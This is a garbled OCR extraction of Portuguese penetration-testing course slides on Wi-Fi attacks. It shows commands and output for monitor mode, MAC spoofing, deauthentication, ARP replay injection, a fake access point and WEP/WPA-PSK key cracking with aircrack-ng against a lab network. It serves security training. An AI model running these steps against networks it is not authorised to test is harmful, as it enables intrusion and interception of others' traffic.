Você está na página 1de 132

1este de Invaso em

kedes Sem I|o


Nelson Murilo
Clavis Segurana da Informao

$ whoami
Consultor Infosec
2 livros publicados
Pentester
Investigador Forense
Incident Handler
Instrutor e Palestrante
Contatos
nmurilo@gmail.com

nelson.murilo

@nelsonmurilo

Modelo do Curso
Aulas ao vivo (on line)
Aulas gravadas para reviso
Ambientes para testes
Material complementar
Avaliao
Agenda
Introduo
Conceitos de redes Wi-Fi
Principais vulnerabilidades
Ferramentas atuais
Sondagem e mapeamento
Identificao do ambiente
Ataques
Finalizando
Introduo
Conceitos

Caractersticas


! Wi-Fi
! Bluetooth
! Infravermelho
! WiMax
! RFID
! Celular (GSM/TDMA/CDMA, etc.)
! ZigBee (802.15.4)
! UWB (802.15.3)
Redes sem fio
IEEE 802.11
Padres atuais:
802.11b 11Mb 2.4Ghz
802.11a 54Mb 5.1GHz
802.11g 54Mb 2.4Ghz
802.11i - Mecanismos de segurana
802.1x Mecanismos de autenticao, uso em
redes cabeadas e sem fio
802.11n Aumento da velocidade, 108Mb
nominais.
# dmesg | grep phy
[ 0.000000] BIOS-provided physical RAM map:
[ 84.913442] ieee80211 phy0: Selected rate control algorithm 'minstrel_ht'
[ 84.913969] Registered led device: rt2800usb-phy0::radio
[ 84.913999] Registered led device: rt2800usb-phy0::assoc
[ 84.914026] Registered led device: rt2800usb-phy0::quality
# iwcong
lo no wireless extensions.

wlan4 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on

eth4 no wireless extensions.

Canais
Canais
Canais
Canais

Channel 36 : 3.18 CPz
Channel 40 : 3.2 CPz
Channel 44 : 3.22 CPz
Channel 48 : 3.24 CPz
Channel 32 : 3.26 CPz
Channel 36 : 3.28 CPz
Channel 60 : 3.3 CPz
Channel 64 : 3.32 CPz
Channel 149 : 3.743 CPz
Channel 133 : 3.763 CPz
Channel 137 : 3.783 CPz
Channel 161 : 3.803 CPz
Channel 163 : 3.823 CPz


5 |w||st w|an0 freq
wlan0 24 channels ln LoLal, avallable
frequencles :
Channel 01 : 2.412 CPz
Channel 02 : 2.417 CPz
Channel 03 : 2.422 CPz
Channel 04 : 2.427 CPz
Channel 03 : 2.432 CPz
Channel 06 : 2.437 CPz
Channel 07 : 2.442 CPz
Channel 08 : 2.447 CPz
Channel 09 : 2.432 CPz
Channel 10 : 2.437 CPz
Channel 11 : 2.462 CPz
Canais
Ad-Hoc
Infraestrutura
((( nome da rede )))
Infraestrutura
((( nome da rede )))
Infraestrutura
Infraestrutura
Infraestrutura
Infraestrutura
Infraestrutura
Infraestrutura
Divulgao do nome da rede
# |w||st w|an0 scan | egrep "Address|LSSID"
[...]
Cell 03 - Address: 7C:4l:83:L4:CC:80
LSSlu:"Cv1-CC81"
Cell 06 - Address: 00:07:40:4D:1A:SC
LSSID:"\x00\x00\x00\x00\x00\x00\x00\x00"
Cell 07 - Address: 6C:2L:83:l3:0C:88
LSSlu:"Cv1-0C87"

Divulgao do nome da rede

23:03:16.386193 8eacon () [1.0 2.0 3.3 11.0 6.0 12.0 24.0 36.0 MblL] LSS CP: 11
23:03:16.488612 8eacon () [1.0 2.0 3.3 11.0 6.0 12.0 24.0 36.0 MblL] LSS CP: 11
23:03:17.321039 8eacon (PomeneL34) [1.0 2.0 3.3 11.0 MblL] LSS CP: 3
23:03:17.629271 8eacon (PomeneL34) [1.0 2.0 3.3 11.0 MblL] LSS CP: 3
Divulgao do nome da rede
09:15:42.216583 218us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:
00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown)
Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|
802.11]

09:15:42.217642 Retry 218us BSSID:00:07:40:4d:1a:5c (oui Unknown)
DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui
Unknown) Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0
18.0 Mbit][|802.11]

09:15:42.218638 314us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:
00:21:29:65:b8:45 (oui Unknown) SA:00:07:40:4d:1a:5c (oui Unknown)
Probe Response (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] CH: 11[|802.11]
00:07:40:4u:1A:3C
Divulgao do nome da rede
09:15:42.217642 Retry 218us BSSID:00:07:40:4d:1a:5c (oui Unknown)
DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown)
Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|802.11]
Divulgao do nome da rede
WEP
WPA
WPA-PSK (Pre-shared Key)
WPA - Enterprise
8AuluS
WPA - Enterprise
8AuluS
/eLc/password
/eLc/raddb/users
Cracle/MySCL/eLc
Cerucado ulglLal
8lomeLrla
Conceitos iniciais
5 ]sb|n]|fconhg w|an0
wlan0 Llnk encap:LLherneL PWaddr 00:21:29:63:b8:43
U 8kCADCAS1 MUL1ICAS1 M1U:1S00 Metr|c:1
8x packeLs:0 errors:0 dropped:0 overruns:0 frame:0
1x packeLs:0 errors:0 dropped:0 overruns:0 carrler:0
colllslons:0 Lxqueuelen:1000
8x byLes:0 (0.0 8) 1x byLes:0 (0.0 8)
# tcpdump -vv -c 3 -i wlan0
Lcpdump: llsLenlng on wlan0, llnk-Lype Ln10M8 (LLherneL), capLure slze 63333
byLes
14:00:37.291962 l (Los 0x0, ul 64, ld 0, oseL 0, ags [ul], proLo lCM (1), lengLh
84)
192.168.11.2 > alr: lCM echo requesL, ld 30307, seq 9, lengLh 64

14:00:37.292417 l (Los 0x0, ul 64, ld 8024, oseL 0, ags [ul], proLo uu (17),
lengLh 71)
192.168.11.2.49331 > alr: [udp sum ok] 2302+ 18? 1.11.168.192.ln-addr.arpa.
(43)

14:00:37.294831 l (Los 0x0, ul 233, ld 49706, oseL 0, ags [none], proLo lCM
(1), lengLh
84) alr > 192.168.11.2: lCM echo reply, ld 30307, seq 9, lengLh 64
3 packeLs capLured
Modo promiscuo
Modo promiscuo
# |wconhg w|an0
wlan0 lLLL 802.11bg LSSlu:o/any
Mode:Managed Access olnL: noL-AssoclaLed 1x-ower=20 d8m
8eLry long llmlL:7 81S Lhr:o lragmenL Lhr:o
Lncrypuon key:o
ower ManagemenL:on
# |w w|an0 |nfo
lnLerface wlan0
lndex 32
Lype managed

# iw dev wlan0 interface add mon0 type monitor

Modo Monitor
# iwcong wlan0 mode monitor
Modo Monitor
# iwcong mon0
mon0 lLLL 802.11bg Mode:Mon|tor 1x-ower=20 d8m
8eLry long llmlL:7 81S Lhr:o lragmenL Lhr:o
ower ManagemenL:on
# iw mon0 info
lnLerface mon0
lndex 33
type mon|tor

Modo monitor
# tcpdump -c 3 -i mon0 -vv
tcpdump: WARNING: mon0: no IPv4 address assigned
tcpdump: listening on mon0, link-type IEEE802_11_RADIO (802.11 plus radiotap
header), capture size 65535 bytes

14:22:52.234724 1.0 Mb/s 2412 MHz 11b -74dB signal antenna 1 [bit 14] 0us
Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 Mbit] ESS CH: 1,
PRIVACY[|802.11]

14:22:52.260469 1.0 Mb/s 2412 MHz 11b -48dB signal antenna 1 [bit 14] WEP
Encrypted 0us Data IV:5b5 Pad 20 KeyID 2

14:22:52.261938 54.0 Mb/s 2412 MHz 11g -18dB signal antenna 1 [bit 14] WEP
Encrypted 44us Data IV:4104 Pad 20 KeyID 0
3 packets captured
Seleo de canais
# iwcong mon0 channel 11

# iwcong mon0
mon0 lLLL 802.11bg Mode:MonlLor lrequency:2.462
CPz 1x-ower=20 d8m
8eLry long llmlL:7 81S Lhr:o lragmenL Lhr:o
ower ManagemenL:on
Seleo de canais
# tcpdump -c 3 -i mon0 -vv
tcpdump: WARNING: mon0: no IPv4 address assigned
tcpdump: listening on mon0, link-type IEEE802_11_RADIO (802.11 plus radiotap
header),
capture size 65535 bytes

14:49:58.832316 1.0 Mb/s 2462 MHz 11b -62dB signal antenna 1 [bit 14] 0us
Beacon () [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11[|802.11]

14:49:58.847041 1.0 Mb/s 2462 MHz 11b -78dB signal antenna 1 [bit 14] 0us
Beacon (GVT-CC81) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[
|802.11]

14:49:58.866671 1.0 Mb/s 2462 MHz 11b -80dB signal antenna 1 [bit 14] 0us
Beacon (GVT-0C87) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[
|802.11]
3 packets captured
Identificao de APs
CH 5 ][ Elapsed: 0 s ][ 2012-03-07 14:39

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:25:9C:36:A0:9F -88 15 18 108 47 5 11e. OPN bsbca

BSSID STATION PWR Rate Lost Frames Probe

00:25:9C:36:A0:9F 00:0E:2E:EC:6B:05 -1 11 - 0 0 1
00:25:9C:36:A0:9F 00:0E:2E:45:F5:B3 -1 11 - 0 0 1
Identificao de APs
grep 00-25-9C /usr/local/etc/aircrack-ng/airodump-ng-oui.txt
00-25-9C (hex) Cisco-Linksys, LLC
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:25:9C:36:A0:9F -88 15 18 108 47 5 11e. OPN bsbca
Identificao de APs
Anlise do trfego
tshark -r Kismet-20120309-04-23-25-1.pcapdump

6007 334.636502 Apple_67:a1:ef -> Broadcast ARP 114 Gratuitous ARP for 192.168.1.104 (Request)
6448 358.804988 192.168.1.191 -> 239.255.255.250 SSDP 487 NOTIFY * HTTP/1.1
9739 547.951220 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18? Tell 192.168.1.1
9740 547.953352 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18? Tell 192.168.1.1
10144 572.216034 192.168.1.103 -> 224.0.0.251 MDNS 645 Standard query response TXT, cache ush PTR
Identificao de APs
Anlise do trfego
iwcong wlan5
wlan5 IEEE 802.11abgn ESSID:"bsbca"
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
iwcong wlan5 essid bsbca
Filtro de MAC
Filtro de MAC
Filtro de MAC
Filtro de MAC
Filtro de MAC
Cpen8SD]Net8SD
# wicong wi0 -m 00:00:00:00:00:01
L|nux
# ifcong ath0 hw ether 00:00:00:00:00:01
Iree8SD
# ifcong xl3 ether 00:00:00:00:00:01
Mac CSk
# ifcong en0 ether 00:00:00:00:00:01
Filtro de MAC
Wired Equivalent Privacy
Wired Equivalent Privacy
roLocolo frgll
Cuebra exlge capLura de grande numero de pacoLes (+3mll)
Cu por dlclonrlo
vrlas ferramenLas dlsponlvels
Wired Equivalent Privacy
Wired Equivalent Privacy
CH 11 ][ Elapsed: 0 s ][ 2012-02-20 11:06

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:07:40:4D:1A:5C -39 0 3 17 8 11 54 WEP WEP LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:21:29:65:B8:45 0 54 -36 0 20 LABVIRUS
Wired Equivalent Privacy
logLypes=pcapdump,gpsxml,neLxml,neuxL,alerL
]usr]|oca|]etc]k|smet.conf
gps=Lrue
preferredchannels=1,6,11
allowpluglns=Lrue
$ ls -lh klsmeL*
-rw-r--r-- 1 rooL rooL 8.0M 2012-02-20 14:04 klsmeL-20120220-13-47-37-1.pcapdump
hup://blog.klsmeLwlreless.neL/
Su|te formada de vr|os programas

Anllse de Lrfego
Cuebra de chave WL (vrlos upos de aLaques)
ln[eo de pacoLes
Cuebra de chave WA(2)-Sk usando dlclonrlo
Crlao de Access olnL falso

Sequnc|a comum

Alrmon-ng: Coloca a lnLerface em modo monlLor
Alrodump-ng: vlsuallzao e capLura de pacoLes
Alrcrack-ng: Cuebra da chave WL

# airmon-ng

Interface Chipset Driver

wlan5 Ralink RT2870/3070 rt2800usb - [phy48]
# airmon-ng

Interface Chipset Driver

wlan5 Ralink RT2870/3070rt2800usb -
[phy48]
# airmon-ng start wlan5
Interface Chipset Driver

wlan2 Realtek RTL8187L rtl8187 - [phy51]
(monitor mode enabled on mon0)
# airmon-ng

Interface Chipset Driver

wlan5 Ralink RT2870/3070 rt2800usb - [phy48]
# airmon-ng start wlan5
Interface Chipset Driver

wlan2 Realtek RTL8187L rtl8187 - [phy51]
(monitor mode enabled on mon0)
# airmon-ng start wlan5 11
Interface Chipset Driver

wlan2 Realtek RTL8187L rtl8187 - [phy51]
(monitor mode enabled on mon0)
Alrodump-ng
# airodump-ng wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.
Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.
Alrodump-ng
# airodump-ng mon0
CH 11 ][ Elapsed: 4 s ][ 2012-02-21 17:01

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:07:40:4D:1A:5C -41 1091 55109 0 0 11 54 WEP WEP LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:21:29:65:B8:45 -127 0 - 1 3 9 LABVIRUS
Alrcrack-ng
$ aircrack-ng labvirus-01.pcap


[00:00:03] 1esLed 633 keys (goL 46103 IVs)

k8 depLh byLe(voLe)
0 2/ 4 14(33332) 13(34328) 3C(33304) 98(33304) 24(33248)
1 2/ 1 uL(34784) 92(34328) 06(32992) 7u(32736) 02(32480)
2 1/ 3 82(36376) 18(34272) 43(33760) Cu(33304) lC(33248)
3 1/ 3 09(37600) 08(33808) 41(33040) C9(34016) 8L(32992)
4 31/ 4 A1(48640) 83(48384) 86(48384) 99(48384) 82(48384)

kL? lCunu! [ 6L:61:6l:xx:xx:xx:xx:xx:xx:xx:xx ] (ASCll: naoxxxxxxxx )
uecrypLed correcLly: 100
Wired Equivalent Privacy
Wired Equivalent Privacy
Alreplay-ng
# aireplay-ng --test mon0
17:33:50 Trying broadcast probe requests...
17:33:50 Injection is working!
17:33:52 Found 1 AP

17:33:52 Trying directed probe requests...
17:33:52 00:25:9C:36:0A:EF - channel: 11 LABVIRUS'
17:33:52 Ping (min/avg/max): 1.671ms/6.230ms/11.234ms Power: -28.73
17:33:52 30/30: 100%
Alreplay-ng
# aireplay-ng --arpreplay h mac_cliente e ESSID interface
# arp an
#
# ping -c 1 192.168.11.1
PING 192.168.11.1 (192.168.11.1) 56(84) bytes of data.
64 bytes from 192.168.11.1: icmp_seq=1 ttl=255 time=54.9 ms

--- 192.168.11.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 54.973/54.973/54.973/0.000 ms

# arp an
(192.168.11.1) at 00:07:40:35:a1:18 [ether] on wlan0
Alreplay-ng
CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:07:40:4D:1A:5C -38 100 239 58 1 11 54 WEP WEP LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:21:29:65:B8:45 -14 36 -54 1 128 LABVIRUS
Alreplay-ng
CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:07:40:4D:1A:5C -38 100 239 58 1 11 54 WEP WEP LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:21:29:65:B8:45 -14 36 -54 1 128 LABVIRUS
aireplay-ng --arpreplay -h 00:21:29:65:B8:45 -e LABVIRUS mon0
The interface MAC (00:26:5A:74:15:28) doesn't match the specied MAC (-h).
ifcong mon0 hw ether 00:21:29:65:B8:45
17:44:10 Waiting for beacon frame (ESSID: LABVIRUS) on channel 11
Found BSSID "00:07:40:4D:1A:5C" to given ESSID "LABVIRUS".
Saving ARP requests in replay_arp-0221-174410.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 67093 packets (got 9624 ARP requests and 14601 ACKs), sent 15934 packets...(500 pps)
Alreplay-ng
CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:07:40:4D:1A:5C -38 100 239 58 1 11 54 WEP WEP LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:21:29:65:B8:45 -14 36 -54 1 128 LABVIRUS
aireplay-ng --arpreplay -h 00:21:29:65:B8:45 -e LABVIRUS mon0
The interface MAC (00:26:5A:74:15:28) doesn't match the specied MAC (-h).
ifcong mon0 hw ether 00:21:29:65:B8:45
17:44:10 Waiting for beacon frame (ESSID: LABVIRUS) on channel 11
Found BSSID "00:07:40:4D:1A:5C" to given ESSID "LABVIRUS".
Saving ARP requests in replay_arp-0221-174410.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 67093 packets (got 9624 ARP requests and 14601 ACKs), sent 15934 packets...(500 pps)
CH 11 ][ Elapsed: 48 s ][ 2012-02-21 17:44 ][ Decloak: 00:07:40:4D:1A:5C

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:07:40:4D:1A:5C -38 100 353 14438 652 11 54 WEP WEP LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:21:29:65:B8:45 0 54 - 1 4042 28810 LABVIRUS
Alreplay-ng
# airmon-ng start wlan5 11
Interface Chipset Driver

wlan2 Realtek RTL8187L rtl8187 - [phy51]
(monitor mode enabled on mon0)
# airodump-ng -c 11 mon0
Alreplay-ng
Lsperar uma nova conexo
lorar uma desconexo
aireplay-ng --deauth 100 h MAC_CLIENTE e ESSID mon0
lvsLools-ng
Aircrack-ng 1.1 r2076

[00:00:02] Tested 132441 keys (got 2448 IVs)

KB depth byte(vote)
0 19/ 34 F7(3840) 05(3584) 1A(3584) 2B(3584) 32(3584)
1 43/ 1 E7(3328) 01(3072) 02(3072) 04(3072) 0B(3072)
2 42/ 2 BB(3328) 15(3072) 21(3072) 28(3072) 34(3072)
3 0/ 7 CB(5888) A7(4352) 0B(4096) 5E(4096) 93(4096)
4 8/ 47 FF(4096) 1B(3840) 2E(3840) 44(3840) 83(3840)

Failed. Next try with 5000 IVs.
Aircrack-ng 1.1 r2076

[00:00:03] Tested 163521 keys (got 7120 IVs)

KB depth byte(vote)
0 4/ 7 FE(9984) 18(9728) 29(9728) 7F(9728) B4(9728) F6(9728)
1 23/ 24 B5(8960) 27(8704) 37(8704) 4A(8704) 51(8704) 53(8704) 28)
2 44/ 2 FA(8448) 00(8192) 26(8192) 2B(8192) 3D(8192) 4C(8192) 8)
3 19/ 3 93(9216) 0B(8960) 11(8960) 12(8960) 1D(8960) 3F(8960) 84)
4 19/ 20 BE(8960) 0A(8704) 11(8704) 12(8704) 3E(8704) 52(8704) 8)

Failed. Next try with 10000 IVs.
lvsLools-ng
lvsLools-ng
for i in poucosivs-0*; do ivstools --convert $i $i.ivs ; done
Opening poucosivs-01.cap
Creating poucosivs-01.cap.ivs
Read 18995 packets.
Written 2448 IVs.
Opening poucosivs-03.cap
Creating poucosivs-03.cap.ivs
Read 551433 packets.
Written 30547 IVs.
Opening poucosivs-04.cap
Creating poucosivs-04.cap.ivs
Read 129917 packets.
Written 13092 IVs.
lvsLools-ng
ivstools --merge *.ivs poucostotal.ivs
Creating poucostotal.ivs
Opening poucosivs-01.cap.ivs
334818 bytes written
Opening poucosivs-03.cap.ivs
4524402 bytes written
Opening poucosivs-04.cap.ivs
6319236 bytes written
# aircrack-ng poucosivs-01.cap poucosivs-02.cap poucosivs-03.cap poucosivs-04.cap
Opening poucosivs-01.cap
Opening poucosivs-02.cap
Opening poucosivs-03.cap
Opening poucosivs-04.cap
Read 689344 packets.

# BSSID ESSID Encryption

1 00:07:40:4D:1A:5C LABVIRUS WEP (40296 IVs)
lvsLools-ng
# tcpdump -vvv -n -r labvirus-01.cap
16:24:28.546838 0us Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11, PRIVACY[|802.11]
16:24:29.251394 104us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.251398 0us Acknowledgment RA:c8:bc:c8:20:38:5c
16:24:29.251910 0us Acknowledgment RA:00:1c:b3:af:ae:1e
16:24:29.259072 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259080 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.259586 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259594 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.396292 90us Request-To-Send TA:c8:bc:c8:20:38:5c
# tcpdump -vvv -n -r labvirus-01.cap
16:24:28.546838 0us Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11, PRIVACY[|802.11]
16:24:29.251394 104us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.251398 0us Acknowledgment RA:c8:bc:c8:20:38:5c
16:24:29.251910 0us Acknowledgment RA:00:1c:b3:af:ae:1e
16:24:29.259072 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259080 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.259586 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259594 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.396292 90us Request-To-Send TA:c8:bc:c8:20:38:5c
# airdecap-ng -w 6E616FXXXXXXXXXX -e LABVIRUS labvirus-01.cap
Total number of packets read 298278
Total number of WEP data packets 162412
Total number of WPA data packets 0
Number of plaintext data packets 0
Number of decrypted WEP packets 108781
Number of corrupted WEP packets 0
Number of decrypted WPA packets 0
# tcpdump -vvv -n -r labvirus-01.cap
16:24:28.546838 0us Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11, PRIVACY[|802.11]
16:24:29.251394 104us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.251398 0us Acknowledgment RA:c8:bc:c8:20:38:5c
16:24:29.251910 0us Acknowledgment RA:00:1c:b3:af:ae:1e
16:24:29.259072 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259080 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.259586 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259594 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.396292 90us Request-To-Send TA:c8:bc:c8:20:38:5c
# airdecap-ng -w 6E616FXXXXXXXXXX -e LABVIRUS labvirus-01.cap
Total number of packets read 298278
Total number of WEP data packets 162412
Total number of WPA data packets 0
Number of plaintext data packets 0
Number of decrypted WEP packets 108781
Number of corrupted WEP packets 0
Number of decrypted WPA packets 0
16:24:43.166932 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
16:24:43.170518 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 335
16:24:43.173590 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 327
16:24:43.176662 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
16:24:43.181784 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 311
16:24:43.187416 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 343
16:24:43.190486 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
16:24:43.193558 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 331
16:24:43.197654 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 337
16:24:43.201748 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 325
16:24:43.204822 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 331
16:25:05.057281 IP 0.0.0.0.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:21:2
9:65:b8:45 (oui Unknown), length 300
16:25:05.060444 IP 192.168.11.1.bootps > 192.168.11.2.bootpc: BOOTP/DHCP, Reply, length 300
16:25:05.075290 IP 0.0.0.0.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:21:2
9:65:b8:45 (oui Unknown), length 300
CP 11 ][ Llapsed: 4 s ][ 2012-02-27 21:14

8SSlu W8 8eacons #uaLa, #/s CP M8 LnC ClPL8 Au1P LSSlu

2L:74:C2:8A:A3:8A -87 2 0 0 3 34e WA2 CCM Sk lhone de Marcelo
00:23:9C:36:0A:Ll -43 3 0 0 1 34 WA2 CCM Sk PomeneL34

8SSlu S1A1lCn W8 8aLe LosL lrames robe

(noL assoclaLed) 00:18:77:7C:2C:A7 -86 0 - 1 68 8 noLebook
(noL assoclaLed) 00:21:29:63:88:43 -47 0 - 1 7 2 LA8vl8uS
Wired Equivalent Privacy
CH 4 ][ Elapsed: 28 s ][ 2012-02-28 07:59

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:26:CB:11:5F:30 -64 16 0 0 11 54e. WPA2 CCMP MGT 88200W
00:1C:10:AE:B6:8F -68 20 0 0 6 54 OPN linksys
74:EA:3A:CF:13:7C -70 15 2 0 11 54 . WPA2 CCMP PSK LABVIRUS
00:E0:FC:4D:27:49 -79 0 0 0 11 54 WPA2 TKIP PSK Pessoal

BSSID STATION PWR Rate Lost Frames Probe

(not associated) DC:2B:61:33:2B:6C -53 0 - 1 0 12 Boingo Hotspot,EuroYouthHotel,hostalparis3,RYANS-PARADIS-W
Wired Equivalent Privacy
Wired Equivalent Privacy
# airbase-ng -N --essid LABVIRUS -c 1 -v -W 1 mon0
09:57:07 Created tap interface at0
09:57:07 Trying to set MTU on at0 to 1500
09:57:07 Access Point with BSSID 00:21:29:65:B8:45 started.
09:57:09 Got broadcast probe request from 34:15:9E:E3:97:A7
09:57:09 Got broadcast probe request from 34:15:9E:E3:97:A7
09:57:09 Got directed probe request from E0:F8:47:C3:30:14 - "LABVIRUS"
09:57:09 Got directed probe request from E0:F8:47:C3:30:14 - "LABVIRUS
09:57:10 Got an auth request from E0:F8:47:C3:30:14 (shared key)
09:57:10 Broken SKA: E0:F8:47:C3:30:14 (expected: 151, got 32 bytes)
09:57:10 SKA from E0:F8:47:C3:30:14
09:57:10 Client E0:F8:47:C3:30:14 associated (WEP) to ESSID: "LABVIRUS"
09:57:10 Ignored IPv6 packet.
09:57:10 Starting Hirte attack against E0:F8:47:C3:30:14 at 100 pps.
09:57:10 Added ARP packet to cfrag buffer.
Wired Equivalent Privacy

# airodump-ng --bssid 00:21:29:65:B8:45 -w cafe-latte -c 1 mon0
# aircrack-ng cafe-latte-01.cap

Aircrack-ng 1.1 r2076
[00:00:00] Tested 798 keys (got 38085 IVs)

KB depth byte(vote)
0 0/ 1 6E(56064) 15(45824) 3D(45312) AA(44800) 4A(44288)
1 0/ 9 61(53760) 44(46336) 98(45568) 0E(44800) C4(44800)
2 33/ 2 AE(41728) 18(41472) 6C(41472) 6F(41472) A1(41472)
3 7/ 3 F0(43776) 70(43264) B4(43264) 62(43008) 50(42752)
4 0/ 2 B8(56576) CD(46848) 94(46080) C9(45056) 3F(44800)

KEY FOUND! [ 6E:61:6F:XX:XX:XX:XX:XX:XX:XX:XX:XX] (ASCII: naoxxxxxxxxxxx )
Decrypted correctly: 100%


AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
AP sem clientes
Migration WPA-WEP
Migration WPA-WEP
Migration WPA-WEP
Migration WPA-WEP
Migration WPA-WEP
Wired Equivalent Privacy
WPA
CH 5 ][ Elapsed: 3 mins ][ 2012-02-22 05:45

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:26:CB:11:5F:30 -64 66 1 0 11 54e. WPA2 CCMP MGT 88200Wireless-d
00:26:CB:B9:23:40 -77 68 0 0 6 54e. WPA2 CCMP MGT 88200Wireless-d
00:26:CB:C4:BD:90 -81 66 0 0 6 54e. WPA2 CCMP MGT 88200Wireless-d
94:0C:6D:BB:2C:94 -89 23 0 0 6 11 . WPA2 CCMP PSK Testeee
00:14:D1:C7:BD:00 -90 51 7 0 11 54e OPN AER 5 andar
00:26:CB:B9:24:C0 -82 17 0 0 1 54e. WPA2 CCMP MGT 88200Wireless-d
00:26:CB:C4:BA:00 -90 9 0 0 11 54e. WPA2 CCMP MGT 88200Wireless-d
alrcrack-ng labvlrus_wpa-01.cap
Cpenlng labvlrus_wpa-01.cap
8ead 234839 packeLs.

# 8SSlu LSSlu Lncrypuon

1 00:07:40:4u:1A:3C LA8vl8uS WA (0 handshake)
airodump-ng -w labvirus_wpa -c 11 --bssid 00:07:40:4D:1a:5c mon0
CH 11 ][ Elapsed: 12 s ][ 2012-03-01 14:06

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:07:40:4D:1A:5C -45 61 76 25 1 11 54 WPA CCMP PSK LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

